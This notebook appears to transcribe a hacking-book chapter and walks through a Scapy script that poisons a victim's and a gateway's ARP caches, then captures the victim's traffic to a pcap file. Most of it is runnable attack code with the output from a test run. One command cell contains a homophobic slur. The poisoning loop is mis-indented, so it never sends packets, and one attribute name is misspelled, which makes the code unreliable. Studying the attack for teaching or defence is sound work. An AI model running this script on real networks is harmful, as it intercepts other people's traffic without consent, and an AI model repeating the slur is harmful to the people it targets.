<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C3-Owning_The_Network_With_Scapy/ARP_Cache_Poisoning.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# *__ARP Cache Poisoning with Scapy__*

ARP poisoning is one of the oldest yet most effective tricks in a hacker's toolkit. Quite simply, we will convince a target machine that we have become its gateway, and we will also convince the gateway that in order to reach the target machine, all traffic has to go through us. Every computer on a network maintains an __ARP cache__ that stores the most recent media access control (__MAC__) addresses matching the IP addresses on the local network. We'll poison this cache with entries that we control to achieve this attack. Because the Address Resolution Protocol, and ARP poisoning in general, is covered in numerous other materials, we'll leave it to you to do any necessary research to understand how this attack works at a lower level.

Now that we know what we need to do, let's put it into practice. When the authors tested this, we attacked a real Mac machine from a Kali VM. We have also tested this code against various mobile devices connected to a wireless access point, and it worked great. The first thing we'll do is check the ARP cache on the target Mac machine so we can see the attack in action later on. Examine the following to see how to inspect the ARP cache on your Mac:
```
MacBook-Pro-Merd:~ victim$ ifconfig en0
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
ether 38:f9:d3:63:5c:48
inet6 fe80::4bc:91d7:29ee:51d8%en0 prefixlen 64 secured scopeid 0x6
inet 192.168.1.193 netmask 0xffffff00 broadcast 192.168.1.255
inet6 2600:1700:c1a0:6ee0:1844:8b1c:7fe0:79c8 prefixlen 64 autoconf secured
inet6 2600:1700:c1a0:6ee0:fc47:7c52:affd:f1f6 prefixlen 64 autoconf temporary
inet6 2600:1700:c1a0:6ee0::31 prefixlen 64 dynamic
nd6 options=201<PERFORMNUD,DAD>
media: autoselect
status: active
```
The _ifconfig_ command displays the network configuration for the specified interface (here, it's _en0_) or for all interfaces if you don't specify one. The output shows that the _inet_ (IPv4) address for the device is 192.168.1.193. Also listed are the MAC address (38:f9:d3:63:5c:48, labeled as _ether_) and a few IPv6 addresses. ARP poisoning works only for IPv4 addresses, so we'll ignore the IPv6 ones.

Now let's see what the Mac has in its ARP address cache. The following shows what it thinks the MAC addresses are for its neighbors on the network:
```
MacBook-Pro-Merd:~ victim$ arp -a
kali.attlocal.net (192.168.1.203) at a4:5e:60:ee:17:5d on en0 ifscope #[1]
dsldevice.attlocal.net (192.168.1.254) at 20:e5:64:c0:76:d0 on en0 ifscope #[2]
? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]
```
We can see that the IP address of the Kali machine belonging to the attacker __[1]__ is 192.168.1.203 and its MAC address is a4:5e:60:ee:17:5d. The gateway connects both attacker and victim machines to the internet. Its IP address __[2]__ is at 192.168.1.254 and its associated ARP cache entry has a MAC address of 20:e5:64:c0:76:d0. We will take note of these values because we can view the ARP cache while the attack is occurring and see that we have changed the gateway's registered MAC address. Now that we know the gateway and the target IP address, let's begin coding the ARP poisoning script. Open a new Python file, call it _arper.py_, and enter the following code. We'll start by stubbing out the skeleton of the file to give you a sense of how we'll construct the poisoner:

In [ ]:
from multiprocessing import Process
from scapy.all import (ARP, Ether, conf, get_if_hwaddr, 
                       send, sniff, sndrcv, srp,wrpcap)
import os
import sys
import time

def get_mac(targetip): #[1]
    pass

class Arper:
    def __init__(self, victim, gateway, interface="en0"):
        pass
    
    def run(self):
        pass

    def poison(self): #[2]
        pass
    
    def sniff(self, count=100): #[3]
        pass

    def restore(self): #[4]
        pass

if __name__ == "__main__":
    (victim, gateway, interface) = (sys.argv[1], sys.argv[2], sys.argv[3])
    myarp = Arper(victim, gateway, interface)
    myarp.run()

As you can see, we'll define a helper function to get the MAC address for any given machine __[1]__ and an __Arper__ class to _poison_ __[2]__, _sniff_ __[3]__, and _restore_ __[4]__ the network settings. Let's fill out each section, starting with the _get_mac_ function, which returns a MAC address for a given IP address. We need the MAC addresses of the victim and the gateway.

In [ ]:
def get_mac(targetip):
    packet = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op="who-has", pdst=targetip) #[1]
    resp, _ = srp(packet, timeout=2, retry=10, verbose=False) #[2]
    for _, r in resp:
        return r[Ether].src
    return None

We pass in the target IP address and create a packet __[1]__. The __Ether__ function specifies that this packet is to be broadcast, and the __ARP__ function specifies the request for the MAC address, asking each node whether it has the target IP. We send the packet with the Scapy function __srp__ __[2]__, which sends and receives a packet on network layer 2. We get the answer in the __resp__ variable, which should contain the Ether layer source (the MAC address) for the target IP.

Next, let's begin writing the __Arper__ class:

In [ ]:
class Arper():
    def __init__(self, victim, gateway, interface="en0"):
        self.victim = victim
        self.victimmac = get_mac(victim)
        self.gateway = gateway
        self.gatewaymac = get_mac(gateway)
        self.inteface = interface
        conf.iface = interface
        conf.verb = 0

        print(f"Initialized {interface}:")
        print(f"Gateway ({gateway}) is at {self.gatewaymac}.")
        print(f"Victim ({victim}) is at {self.victimmac}.")
        print('-' * 30)

We intialize the class with the victim and gateway IPs and specify the interface to use (_en0_ is the default) __[1]__. With this info, we populate the object variables __interface__, __victim__, __victimmac__, __gateway__, and __gatewaymac__, printing the values to the console __[2]__.

Within the __Arper__ class we write the __run__ function, which is the entry point for the attack:

In [ ]:
class Arper():
    def run(self):
        self.poison_thread = Process(target=self.poison) #[1]
        self.poison_thread.start()

        self.sniff_thread = Process(target=self.sniff) #[2]
        self.sniff_thread.start()

The __run__ method performs the main work of the __Arper__ object. It sets up and runs two processes one to poison the ARP cache __[1]__ and another so we can watch the attack in progress by sniffing the network traffic __[2]__.

The __poison__ method creates the poisoned packets and sends them to the victim and the gateway.

In [ ]:
class Arper():
    def poison(self):
        poison_victim = ARP() #[1]
        poison_victim.op = 2
        poison_victim.psrc = self.gateway
        poison_victim.pdst = self.victim
        poison_victim.hwdst = self.victimmac
        print(f"ip src: {poison_victim.psrc}")
        print(f"ip dst: {poison_victim.pdst}")
        print(f"mac dst: {poison_victim.hwdst}")
        print(f"mac src: {poison_victim.hwsrc}")
        print(poison_victim.summary())
        print('-' * 30)
        poison_gateway = ARP() #[2]
        poison_gateway.op = 2
        poison_gateway.psrc = self.victim
        poison_gateway.pdst = self.gateway
        poison_gateway.hwdst = self.gatewaymac

        print(f"ip src: {poison_gateway.psrc}")
        print(f"ip dst: {poison_gateway.pdst}")
        print(f"mac dst: {poison_gateway.hwdst}")
        print(f"mac src: {poison_gateway.hwsrc}")
        print(poison_gateway.summary())
        print('-' * 30)
        print(f"Beginning the ARP poison. [CTRL-C to stop]")
        while True: #[3]
            sys.stdout.write('.')
            sys.stdout.flush()
        try:
            send(poison_victim)
            send(poison_gateway)
        except KeyboardInterrupt: #[4]
            self.restore()
            sys.exit()
        else:
            time.sleep(2)

The __poison__ method sets up the data we'll use to poison the victim and the gateway. First, we create a poisoned ARP packet intended for the victim __[1]__. Likewise, we create a poisoned ARP packet for the gateway __[2]__. We poison the gateway by sending it the victim's IP address but the attacker's MAC address. Likewise, we poison the victim by sending it the gateway's IP address but the attacker's MAC address. We print all of this information to the console so we can be sure of our packet's destinations and payloads.

Next, we start sending the poisoned packets to their destinations in an infinite loop to make sure that the respective ARP cache entries remain poisoned for the duration of the attack __[3]__. The loop will continue until you press CTRL-C (_KeyboardInterrupt_) __[4]__, in which case we restore things to normal (by sending the correct information to the victim and the gateway, undoing our poisoning attack).

In order to see and record the attack as it happens, we sniff the network traffic with the __sniff__ method:

In [ ]:
class Arper():
    def sniff(self, count=100):
        time.sleep(5) #[1]
        print(f"Sniffing {count} packets")
        bpf_filter = "ip host %s" % self.victim #[2]
        packets = sniff(count=count, filter=bpf_filter, iface=self.interface) #[3]
        wrpcap("arper.pcap", packets) #[4]
        print("Got the packets")
        self.restore() #[5]
        self.poison_thread.terminate()
        print("Finished.")

The __sniff__ method sleeps for five seconds __[1]__ before it starts sniffing in order to give th poisoning thread time to start working. It sniffs for a number of packets (100 by default) __[3]__, filtering for packets that have the victim's IP __[2]__. Once we've captured the packets, we write them to a file called _arper.pcap_ __[4]__, restore the ARP tables to their original values __[5]__, and terminate the poison thread.

Finally, the __restore__ method puts the victim and gateway machines back to their original state by sending correct ARP information to each machine:

In [ ]:
class Arper():
    def restore(self):
        print("Restoring ARP tables...")

        packet_for_victim = ARP(
            op=2,
            psrc=self.gateway,
            hwsrc=self.gatewaymac,
            pdst=self.victim,
            hwdst="ff:ff:ff:ff:ff:ff"
        )
        send(packet_for_victim, count=5) #[1]

        packet_for_gateway = ARP(
            op=2,
            psrc=self.victim,
            hwsrc=self.victimmac,
            pdst=self.gateway,
            hwdst="ff:ff:ff:ff:ff:ff"
        )
        send(packet_for_gateway, count=5) #[2]

The __restore__ method could be called from either the __poison__ method (if you hit CTRL-C) or the __sniff__ method (when the specified number of packets have been captured). It sends the original values for the gateway IP and MAC addresses to the victim __[1]__, and it sends the original values for the victim's IP and MAC to the gateway __[2]__.
Let's take this bad boy for a spin!

# *__Kicking the Tires__*

Before we begin, we need to first tell the local host machine that we can forward packets along to both the gateway and the target IP address. If you are on your Kali VM, enter the following command into your terminal:
```
#:> echo 1 > /proc/sys/net/ipv4/ip_forward
```
If you are an __Apple faggit__, use the following command:
```
#:> sudo sysctl -w net.inet.ip.forwarding=1
```
Now that we have IP forwarding in place, let's fire up the script and check the ARP cache of the target machine. From your attacking machine, run the following (as root):
```
#:> python arper.py 192.168.1.193 192.168.1.254 en0
Initialized en0:
Gateway (192.168.1.254) is at 20:e5:64:c0:76:d0.
Victim (192.168.1.193) is at 38:f9:d3:63:5c:48.
------------------------------
ip src: 192.168.1.254
ip dst: 192.168.1.193
mac dst: 38:f9:d3:63:5c:48
mac src: a4:5e:60:ee:17:5d
ARP is at a4:5e:60:ee:17:5d says 192.168.1.254
------------------------------
ip src: 192.168.1.193
ip dst: 192.168.1.254
mac dst: 20:e5:64:c0:76:d0
mac src: a4:5e:60:ee:17:5d
ARP is at a4:5e:60:ee:17:5d says 192.168.1.193
------------------------------
Beginning the ARP poison. [CTRL-C to stop]
...Sniffing 100 packets
......Got the packets
Restoring ARP tables...
Finished.
```
Awesome! No error or other weirdness. Now let's validate the attack on the target machine. While the script was in the process of capturing the 100 packets, we displayed the ARP table on the victim device with the __arp__ command:
```
MacBook-Pro:~ victim$ arp -a
kali.attlocal.net (192.168.1.203) at a4:5e:60:ee:17:5d on en0 ifscope
dsldevice.attlocal.net (192.168.1.254) at a4:5e:60:ee:17:5d on en0 ifscope
```
You can now see that the poor victim has a poisoned ARP cache, whereas the gateway now has the same MAC address as the attacking computer. You can clearly see in the entry above the gateway that we're attacking from 192.168.1.203. When the attack has finished capturing packets, you should see an __arper.pcap__ file in the same directory as your script. You can, of course, do things such as force the target computer to proxy all of its traffic through a local instance of Burp or do any number of other nasty things. You might want to hang on to that pcap file for the next section on pcap processing, you never know what you might find!